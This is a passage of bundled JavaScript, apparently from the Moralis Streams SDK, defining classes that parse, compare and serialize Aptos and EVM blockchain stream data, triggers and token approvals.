INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */ var $be177b42cca18859$var$__assign = function() {
    $be177b42cca18859$var$__assign = Object.assign || function __assign(t) {
        for(var s, i = 1, n = arguments.length; i < n; i++){
            s = arguments[i];
            for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p)) t[p] = s[p];
        }
        return t;
    };
    return $be177b42cca18859$var$__assign.apply(this, arguments);
};
function $be177b42cca18859$var$__rest(s, e) {
    var t = {};
    for(var p in s)if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) t[p] = s[p];
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        for(var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++)if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i])) t[p[i]] = s[p[i]];
    }
    return t;
}
/**
 * The AptosStream class is a representation of an Aptos Stream that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$752ed3dd409f1f27 = /** @class */ function() {
    function AptosStream(data) {
        this._data = AptosStream.parse(data);
    }
    /**
     * Create a new instance of AptosStream
     *
     * @param data - the AptosStreamish type
     * @example
     * ```ts
     * const aptosStream = AptosStream.create(data);
     * ```
     * @returns an instance of AptosStream
     */ AptosStream.create = function(data) {
        if (data instanceof AptosStream) return data;
        return new AptosStream(data);
    };
    /**
     * Compares two AptosStream data. It checks a deep equality check of both values.
     * @param valueA - the first AptosStreamish data to compare
     * @param valueB - the second AptosStreamish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  AptosStream.equals(valueA, valueB);
     * ```
     */ AptosStream.equals = function(valueA, valueB) {
        var aptosStreamA = AptosStream.create(valueA);
        var aptosStreamB = AptosStream.create(valueB);
        if (aptosStreamA.id !== aptosStreamB.id) return false;
        return true;
    };
    /**
     * Compares an AptosStreamish data to this AptosStream instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * aptosStream.equals(value);
     * ```
     */ AptosStream.prototype.equals = function(value) {
        return AptosStream.equals(this, value);
    };
    /**
     * Converts the AptosStream instance to a JSON object.
     * @returns JSON object of the AptosStream instance
     * @example `aptosStream.toJSON()`
     */ AptosStream.prototype.toJSON = function() {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, this._data), {
            network: this.network.map(function(network) {
                return network.toJSON();
            })
        });
    };
    /**
     * Converts the AptosStream instance to a JSON object.
     * @returns JSON object of the AptosStream instance
     * @example `aptosStream.format()`
     */ AptosStream.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(AptosStream.prototype, "network", {
        get: function() {
            return this._data.network;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "webhookUrl", {
        get: function() {
            return this._data.webhookUrl;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "description", {
        get: function() {
            return this._data.description;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "tag", {
        get: function() {
            return this._data.tag;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "allAddresses", {
        get: function() {
            return this._data.allAddresses;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "id", {
        get: function() {
            return this._data.id;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "status", {
        get: function() {
            return this._data.status;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "statusMessage", {
        get: function() {
            return this._data.statusMessage;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "demo", {
        get: function() {
            return this._data.demo;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "includeChanges", {
        get: function() {
            return this._data.includeChanges;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "includeEvents", {
        get: function() {
            return this._data.includeEvents;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "includePayload", {
        get: function() {
            return this._data.includePayload;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "isErrorSince", {
        get: function() {
            return this._data.isErrorSince;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "events", {
        get: function() {
            return this._data.events;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "functions", {
        get: function() {
            return this._data.functions;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(AptosStream.prototype, "amountOfAddresses", {
        get: function() {
            return this._data.amountOfAddresses;
        },
        enumerable: false,
        configurable: true
    });
    AptosStream.parse = function(data) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            network: data.network.map(function(network) {
                return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network);
            })
        });
    };
    return AptosStream;
}();
/**
 * The StreamSelector class is a representation of a stream selector
 *
 * Use this class any time you want to use a value in your stream trigger data that is not a static value
 *
 * @category DataType
 */ var $be177b42cca18859$var$StreamSelector = /** @class */ function() {
    /**
     * Create a new instance of StreamSelector from any valid stream data field
     *
     * @example
     * ```
     * const receiverSelector = StreamSelector.create('$to')
     * const selector = StreamSelector.create('$contract')
     * ```
     */ function StreamSelector(data) {
        this._value = StreamSelector.parse(data);
    }
    StreamSelector.isSelectorString = function(selector) {
        if (selector instanceof StreamSelector) return true;
        return selector.startsWith("$");
    };
    StreamSelector.create = function(streamSelector) {
        if (streamSelector instanceof StreamSelector) return streamSelector;
        return new StreamSelector(streamSelector);
    };
    StreamSelector.parse = function(streamSelector) {
        if (!StreamSelector.isSelectorString(streamSelector)) throw new (0, $10891f2cb3e98601$export$11e3a3d7d0a8e488)({
            code: (0, $10891f2cb3e98601$export$643b9db13fb4e195).INVALID_ARGUMENT,
            message: "Invalid selector string provided"
        });
        return streamSelector;
    };
    /**
     * Compares two StreamSelector data. It checks a deep equality check of both values.
     * @param valueA - the first StreamSelectorish data to compare
     * @param valueB - the second StreamSelectorish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamSelector.equals(valueA, valueB);
     * ```
     */ StreamSelector.equals = function(valueA, valueB) {
        var streamSelectorA = StreamSelector.create(valueA);
        var streamSelectorB = StreamSelector.create(valueB);
        return streamSelectorA.value === streamSelectorB.value;
    };
    /**
     * Compares an StreamSelectorish data to this StreamSelector instance.
     * @param streamSelector - the streamSelector to compare
     * @returns true if the streamSelector is equal to the current instance, false otherwise
     * @example
     * ```ts
     * streamSelector.equals(streamSelector);
     * ```
     */ StreamSelector.prototype.equals = function(streamSelector) {
        return StreamSelector.equals(this, streamSelector);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamSelector.prototype.format = function() {
        return this.value;
    };
    Object.defineProperty(StreamSelector.prototype, "value", {
        /**
         * @returns the selector path
         * @example '$from'
         */ get: function() {
            return this._value;
        },
        enumerable: false,
        configurable: true
    });
    StreamSelector.prototype.toJSON = function() {
        return this.value;
    };
    return StreamSelector;
}();
/**
 * The StreamTrigger class is a representation of a stream trigger that is used by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$fc515d0f3a73528a = /** @class */ function() {
    function StreamTrigger(data) {
        this._data = StreamTrigger.parse(data);
    }
    StreamTrigger.create = function(data) {
        if (data instanceof StreamTrigger) return data;
        return new StreamTrigger(data);
    };
    StreamTrigger.parseSelectorOrAddress = function(input) {
        var result;
        // If it is not an EvmAddress, it can be a string, but only the ones that are selectors should be treated that way
        if (!(input instanceof (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11)) && $be177b42cca18859$var$StreamSelector.isSelectorString(input)) result = $be177b42cca18859$var$StreamSelector.create(input);
        else result = (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(input);
        return result;
    };
    // eslint-disable-next-line complexity
    StreamTrigger.equals = function(valueA, valueB) {
        var _a, _b;
        var streamTriggerA = StreamTrigger.create(valueA);
        var streamTriggerB = StreamTrigger.create(valueB);
        if (streamTriggerA.type !== streamTriggerB.type) return false;
        // contractAddress can be a StreamSelector or an EvmAddress. It is easier to compare them as strings
        if (streamTriggerA.contractAddress.toJSON() !== streamTriggerB.contractAddress.toJSON()) return false;
        if (streamTriggerA.functionAbi !== streamTriggerB.functionAbi) return false;
        if (((_a = streamTriggerA.inputs) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = streamTriggerB.inputs) === null || _b === void 0 ? void 0 : _b.length)) return false;
        var triggerInputsA = streamTriggerA.inputs || [];
        var triggerInputsB = streamTriggerB.inputs || [];
        for(var i = 0; i < (triggerInputsA === null || triggerInputsA === void 0 ? void 0 : triggerInputsA.length); i++){
            if (triggerInputsA[i] !== triggerInputsB[i]) return false;
        }
        if (streamTriggerA.topic0 !== streamTriggerB.topic0) return false;
        if (streamTriggerA.callFrom !== streamTriggerB.callFrom) return false;
        return true;
    };
    /**
     * Compares two StreamTrigger arrays. It checks a deep equality check of both values, meaning that all the values have to be on both arrays.
     * @param valueA - the first StreamTriggerish[] data to compare
     * @param valueB - the second StreamTriggerish[] data to compare
     * @returns true if all values are equal, false otherwise
     * @example
     * ```ts
     *  StreamTrigger.arrayEquals(valueA, valueB);
     * ```
     */ StreamTrigger.arrayEquals = function(valueA, valueB) {
        if (valueA.length !== valueB.length) return false;
        var triggersA = valueA.map(function(trigger) {
            return StreamTrigger.create(trigger);
        });
        var triggersB = valueB.map(function(trigger) {
            return StreamTrigger.create(trigger);
        });
        var seenTriggersB = Array(triggersB.length).fill(false);
        var _loop_1 = function(i) {
            var indexB = triggersB.findIndex(function(triggerB) {
                return triggerB.equals(triggersA[i]);
            });
            if (indexB < 0) return {
                value: false
            };
            seenTriggersB[indexB] = true;
        };
        for(var i = 0; i < triggersA.length; i++){
            var state_1 = _loop_1(i);
            if (typeof state_1 === "object") return state_1.value;
        }
        if (seenTriggersB.some(function(seen) {
            return !seen;
        })) return false;
        return true;
    };
    /**
     * Compares an StreamTrigger data to this StreamTrigger instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * streamTrigger.equals(value);
     * ```
     */ StreamTrigger.prototype.equals = function(value) {
        return StreamTrigger.equals(this, value);
    };
    /**
     * Converts the StreamTrigger instance to a JSON object.
     * @returns JSON object of the StreamTrigger instance
     * @example `streamTrigger.toJSON()`
     */ StreamTrigger.prototype.toJSON = function() {
        var _a = this._data, contractAddress = _a.contractAddress, callFrom = _a.callFrom, data = $be177b42cca18859$var$__rest(_a, [
            "contractAddress",
            "callFrom"
        ]);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            contractAddress: contractAddress.toJSON(),
            callFrom: callFrom === null || callFrom === void 0 ? void 0 : callFrom.toJSON()
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamTrigger.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamTrigger.prototype, "type", {
        get: function() {
            return this._data.type;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTrigger.prototype, "contractAddress", {
        get: function() {
            return this._data.contractAddress;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTrigger.prototype, "functionAbi", {
        get: function() {
            return this._data.functionAbi;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTrigger.prototype, "inputs", {
        get: function() {
            return this._data.inputs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTrigger.prototype, "topic0", {
        get: function() {
            return this._data.topic0;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTrigger.prototype, "callFrom", {
        get: function() {
            return this._data.callFrom;
        },
        enumerable: false,
        configurable: true
    });
    StreamTrigger.parse = function(data) {
        var contractAddressInput = data.contractAddress, callFromInput = data.callFrom, input = $be177b42cca18859$var$__rest(data, [
            "contractAddress",
            "callFrom"
        ]);
        var contractAddress = StreamTrigger.parseSelectorOrAddress(contractAddressInput);
        var callFrom = (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(callFromInput, function(value) {
            return StreamTrigger.parseSelectorOrAddress(value);
        });
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, input), {
            contractAddress: contractAddress,
            callFrom: callFrom
        });
    };
    return StreamTrigger;
}();
/**
 * The EvmStream class is a representation of Moralis Stream that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$ede2c68543e6ca59 = /** @class */ function() {
    function EvmStream(data) {
        this._data = EvmStream.parse(data);
    }
    /**
     * Create a new instance of EvmStream
     *
     * @param data - the EvmStreamish type
     * @example
     * ```ts
     * const evmStream = EvmStream.create(data);
     * ```
     * @returns an instance of EvmStream
     */ EvmStream.create = function(data) {
        if (data instanceof EvmStream) return data;
        return new EvmStream(data);
    };
    /**
     * Compares two EvmStream data. It checks a deep equality check of both values.
     * @param valueA - the first EvmStreamish data to compare
     * @param valueB - the second EvmStreamish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  EvmStream.equals(valueA, valueB);
     * ```
     */ EvmStream.equals = function(valueA, valueB) {
        var _a, _b;
        var evmStreamA = EvmStream.create(valueA);
        var evmStreamB = EvmStream.create(valueB);
        if (evmStreamA.id !== evmStreamB.id) return false;
        if (((_a = evmStreamA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = evmStreamB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$fc515d0f3a73528a.arrayEquals(evmStreamA.triggers || [], evmStreamB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an EvmStreamish data to this EvmStream instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * evmStream.equals(value);
     * ```
     */ EvmStream.prototype.equals = function(value) {
        return EvmStream.equals(this, value);
    };
    /**
     * Converts the EvmStream instance to a JSON object.
     * @returns JSON object of the EvmStream instance
     * @example `evmStream.toJSON()`
     */ EvmStream.prototype.toJSON = function() {
        var _a = this._data, chains = _a.chains, triggers = _a.triggers, data = $be177b42cca18859$var$__rest(_a, [
            "chains",
            "triggers"
        ]);
        // eslint-disable-next-line @typescript-eslint/no-non-null-assertion
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chainIds: chains.map(function(chain) {
                return chain.toJSON();
            }),
            triggers: triggers === null || triggers === void 0 ? void 0 : triggers.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ EvmStream.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(EvmStream.prototype, "chains", {
        get: function() {
            return this._data.chains;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "chainIds", {
        get: function() {
            return this._data.chains.map(function(chain) {
                return chain.hex;
            });
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "webhookUrl", {
        get: function() {
            return this._data.webhookUrl;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "description", {
        get: function() {
            return this._data.description;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "tag", {
        get: function() {
            return this._data.tag;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "topic0", {
        get: function() {
            return this._data.topic0;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "allAddresses", {
        get: function() {
            return this._data.allAddresses;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "includeNativeTxs", {
        get: function() {
            return this._data.includeNativeTxs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "includeContractLogs", {
        get: function() {
            return this._data.includeContractLogs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "includeInternalTxs", {
        get: function() {
            return this._data.includeInternalTxs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "includeAllTxLogs", {
        get: function() {
            return this._data.includeAllTxLogs;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "abi", {
        get: function() {
            return this._data.abi;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "advancedOptions", {
        get: function() {
            return this._data.advancedOptions;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "id", {
        get: function() {
            return this._data.id;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "status", {
        get: function() {
            return this._data.status;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "statusMessage", {
        get: function() {
            return this._data.statusMessage;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(EvmStream.prototype, "getNativeBalances", {
        get: function() {
            return this._data.getNativeBalances;
        },
        enumerable: false,
        configurable: true
    });
    EvmStream.parse = function(data) {
        var _a, _b, _c, _d, _e;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chains: data.chainIds.map(function(chainId) {
                return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chainId);
            }),
            topic0: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.topic0),
            allAddresses: (_a = data.allAddresses) !== null && _a !== void 0 ? _a : false,
            includeContractLogs: (_b = data.includeContractLogs) !== null && _b !== void 0 ? _b : false,
            includeInternalTxs: (_c = data.includeInternalTxs) !== null && _c !== void 0 ? _c : false,
            includeAllTxLogs: (_d = data.includeAllTxLogs) !== null && _d !== void 0 ? _d : false,
            includeNativeTxs: (_e = data.includeNativeTxs) !== null && _e !== void 0 ? _e : false,
            advancedOptions: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.advancedOptions),
            abi: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.abi),
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger);
                });
            }),
            getNativeBalances: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.getNativeBalances)
        });
    };
    return EvmStream;
}();
var $be177b42cca18859$var$EvmStreamResultFormatter = /** @class */ function() {
    function EvmStreamResultFormatter() {}
    EvmStreamResultFormatter.toJSON = function(data) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            erc20Transfers: data.erc20Transfers.map(function(value) {
                return value.toJSON();
            }),
            erc20Approvals: data.erc20Approvals.map(function(value) {
                return value.toJSON();
            }),
            nftTransfers: data.nftTransfers.map(function(value) {
                return value.toJSON();
            }),
            nftApprovals: {
                ERC721: data.nftApprovals.ERC721.map(function(value) {
                    return value.toJSON();
                }),
                ERC1155: data.nftApprovals.ERC1155.map(function(value) {
                    return value.toJSON();
                })
            },
            ntfTokenApprovals: data.ntfTokenApprovals.map(function(value) {
                return value.toJSON();
            }),
            chain: data.chain.toJSON(),
            block: data.block.toJSON(),
            logs: data.logs.map(function(value) {
                return value.toJSON();
            }),
            txs: data.txs.map(function(value) {
                return value.toJSON();
            }),
            txsInternal: data.txsInternal.map(function(value) {
                return value.toJSON();
            }),
            abi: data.abi,
            nativeBalances: data.nativeBalances.map(function(nativeBalance) {
                return nativeBalance.toJSON();
            })
        });
    };
    return EvmStreamResultFormatter;
}();
/**
 * The StreamTrigger class is a representation of a stream trigger that is used by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$537c1481727bf198 = /** @class */ function() {
    function StreamTriggerOutput(data) {
        this._data = StreamTriggerOutput.parse(data);
    }
    StreamTriggerOutput.create = function(data) {
        if (data instanceof StreamTriggerOutput) return data;
        return new StreamTriggerOutput(data);
    };
    /**
     * Compares two StreamTriggerOutput data. It checks a deep equality check of both values.
     * @param valueA - the first StreamTriggerOutputish data to compare
     * @param valueB - the second StreamTriggerOutputish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamTriggerOutput.equals(valueA, valueB);
     * ```
     */ StreamTriggerOutput.equals = function(valueA, valueB) {
        var streamTriggerOutputA = StreamTriggerOutput.create(valueA);
        var streamTriggerOutputB = StreamTriggerOutput.create(valueB);
        return streamTriggerOutputA.name === streamTriggerOutputB.name && streamTriggerOutputA.value === streamTriggerOutputB.value;
    };
    /**
     * Compares two StreamTriggerOutput arrays. It checks a deep equality check of both values, meaning that all the values have to be on both arrays.
     * @param valueA - the first StreamTriggerOutputish[] data to compare
     * @param valueB - the second StreamTriggerOutputish[] data to compare
     * @returns true if all values are equal, false otherwise
     * @example
     * ```ts
     *  StreamTriggerOutput.arrayEquals(valueA, valueB);
     * ```
     */ StreamTriggerOutput.arrayEquals = function(valueA, valueB) {
        if (valueA.length !== valueB.length) return false;
        var triggerOutputsA = valueA.map(function(triggerOutput) {
            return StreamTriggerOutput.create(triggerOutput);
        });
        var triggerOutputsB = valueB.map(function(triggerOutput) {
            return StreamTriggerOutput.create(triggerOutput);
        });
        triggerOutputsA.sort(function(a, b) {
            return b.name > a.name ? 1 : -1;
        });
        triggerOutputsB.sort(function(a, b) {
            return b.name > a.name ? 1 : -1;
        });
        for(var i = 0; i < (triggerOutputsA === null || triggerOutputsA === void 0 ? void 0 : triggerOutputsA.length); i++){
            if (!triggerOutputsA[i].equals(triggerOutputsB[i])) return false;
        }
        return true;
    };
    /**
     * Compares an StreamTriggerOutputish data to this StreamTriggerOutput instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * streamTriggerOutput.equals(value);
     * ```
     */ StreamTriggerOutput.prototype.equals = function(value) {
        return StreamTriggerOutput.equals(this, value);
    };
    /**
     * Converts the StreamTriggerOutput instance to a JSON object.
     * @returns JSON object of the StreamTriggerOutput instance
     * @example `streamTriggerOutput.toJSON()`
     */ StreamTriggerOutput.prototype.toJSON = function() {
        var data = $be177b42cca18859$var$__rest(this._data, []);
        return $be177b42cca18859$var$__assign({}, data);
    };
    /**
     * @deprecated This method will be removed soon. To format the value, use one of the properties.
     */ StreamTriggerOutput.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamTriggerOutput.prototype, "name", {
        get: function() {
            return this._data.name;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamTriggerOutput.prototype, "value", {
        get: function() {
            return this._data.value;
        },
        enumerable: false,
        configurable: true
    });
    StreamTriggerOutput.parse = function(data) {
        return $be177b42cca18859$var$__assign({}, data);
    };
    return StreamTriggerOutput;
}();
/**
 * The StreamErc1155Approval class is a representation of a nft approval (ERC1155) that is returned by the Moralis Stream API
 *
 * @category DataType
 */ var $be177b42cca18859$export$f142dae0321d08be = /** @class */ function() {
    function StreamErc1155Approval(data) {
        this._data = StreamErc1155Approval.parse(data);
    }
    /**
     * Create a new instance of StreamErc1155Approval
     *
     * @param data - the StreamErc1155Approvalish type
     * @example
     * ```ts
     * const evmNftApproval = StreamErc1155Approval.create(data);
     * ```
     * @returns an instance of StreamErc1155Approval
     */ StreamErc1155Approval.create = function(data) {
        if (data instanceof StreamErc1155Approval) return data;
        return new StreamErc1155Approval(data);
    };
    /**
     * Compares two StreamErc1155Approval data. It checks a deep equality check of both values.
     * @param valueA - the first StreamErc1155Approvalish data to compare
     * @param valueB - the second StreamErc1155Approvalish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamErc1155Approval.equals(valueA, valueB);
     * ```
     */ // eslint-disable-next-line complexity
    StreamErc1155Approval.equals = function(valueA, valueB) {
        var _a, _b;
        var evmNftApprovalA = StreamErc1155Approval.create(valueA);
        var evmNftApprovalB = StreamErc1155Approval.create(valueB);
        if (!evmNftApprovalA.chain.equals(evmNftApprovalB.chain)) return false;
        if (evmNftApprovalA.transactionHash !== evmNftApprovalB.transactionHash) return false;
        if (!evmNftApprovalA.account.equals(evmNftApprovalB.account)) return false;
        if (!evmNftApprovalA.contract.equals(evmNftApprovalB.contract)) return false;
        if (!evmNftApprovalA.operator.equals(evmNftApprovalB.operator)) return false;
        if (evmNftApprovalA.approved !== evmNftApprovalB.approved) return false;
        if (((_a = evmNftApprovalA.triggers) === null || _a === void 0 ? void 0 : _a.length) !== ((_b = evmNftApprovalB.triggers) === null || _b === void 0 ? void 0 : _b.length) || !$be177b42cca18859$export$537c1481727bf198.arrayEquals(evmNftApprovalA.triggers || [], evmNftApprovalB.triggers || [])) return false;
        return true;
    };
    /**
     * Compares an StreamErc1155Approvalish data to this StreamErc1155Approval instance.
     * @param value - the value to compare
     * @returns true if the value is equal to the current instance, false otherwise
     * @example
     * ```ts
     * evmNftApproval.equals(value);
     * ```
     */ StreamErc1155Approval.prototype.equals = function(value) {
        return StreamErc1155Approval.equals(this, value);
    };
    /**
     * Converts the StreamErc1155Approval instance to a JSON object.
     * @returns JSON object of the StreamErc1155Approval instance
     * @example `evmNftApproval.toJSON()`
     */ StreamErc1155Approval.prototype.toJSON = function() {
        var _a;
        var data = this._data;
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: data.chain.toJSON(),
            contract: data.contract.toJSON(),
            account: data.account.toJSON(),
            operator: data.operator.toJSON(),
            triggers: (_a = data.triggers) === null || _a === void 0 ? void 0 : _a.map(function(trigger) {
                return trigger.format();
            })
        });
    };
    /**
     * Converts the StreamErc1155Approval instance to a JSON object.
     * @returns JSON object of the StreamErc1155Approval instance
     * @example `evmNftApproval.format()`
     */ StreamErc1155Approval.prototype.format = function() {
        return this.toJSON();
    };
    Object.defineProperty(StreamErc1155Approval.prototype, "chain", {
        get: function() {
            return this._data.chain;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "approved", {
        get: function() {
            return this._data.approved;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "transactionHash", {
        get: function() {
            return this._data.transactionHash;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "contract", {
        get: function() {
            return this._data.contract;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "logIndex", {
        get: function() {
            return this._data.logIndex;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "account", {
        get: function() {
            return this._data.account;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "operator", {
        get: function() {
            return this._data.operator;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "tokenContractType", {
        get: function() {
            return this._data.tokenContractType;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "tokenName", {
        get: function() {
            return this._data.tokenName;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "tokenSymbol", {
        get: function() {
            return this._data.tokenSymbol;
        },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(StreamErc1155Approval.prototype, "triggers", {
        get: function() {
            return this._data.triggers;
        },
        enumerable: false,
        configurable: true
    });
    StreamErc1155Approval.parse = function(data) {
        var chain = (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(data.chain);
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
            chain: chain,
            logIndex: +data.logIndex,
            account: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.account),
            operator: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.operator),
            contract: (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.contract),
            tokenContractType: data.tokenContractType,
            triggers: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(data.triggers, function(triggers) {
                return triggers.map(function(trigger) {
                    return $be177b42cca18859$export$537c1481727bf198.create(trigger);
                });
            })
        });
    };
    return StreamErc1155Approval;
}();
/**
 * The StreamErc20Transfer class is a representation of a erc20 approval that is returned by the Moralis Stream API
 *
 * @category DataTypexw
 */ var $be177b42cca18859$export$d4b26dff8d4d9eef = /** @class */ function() {
    function StreamErc20Approval(data) {
        this._data = StreamErc20Approval.parse(data);
    }
    /**
     * Create a new instance of StreamErc20Approval
     *
     * @param data - the StreamErc20Approvalish type
     * @example
     * ```ts
     * const erc20Approval = StreamErc20Approval.create(data);
     * ```
     * @returns an instance of StreamErc20Approval
     */ StreamErc20Approval.create = function(data) {
        if (data instanceof StreamErc20Approval) return data;
        return new StreamErc20Approval(data);
    };
    /**
     * Compares two StreamErc20Approval data. It checks a deep equality check of both values.
     * @param valueA - the first StreamErc20Approvalish data to compare
     * @param valueB - the second StreamErc20Approvalish data to compare
     * @returns true if the values are equal, false otherwise
     * @example
     * ```ts
     *  StreamErc20Approval.equals(valueA, valueB);
     * ```
     */ StreamErc20Approval.equals = function(valueA, valueB) {
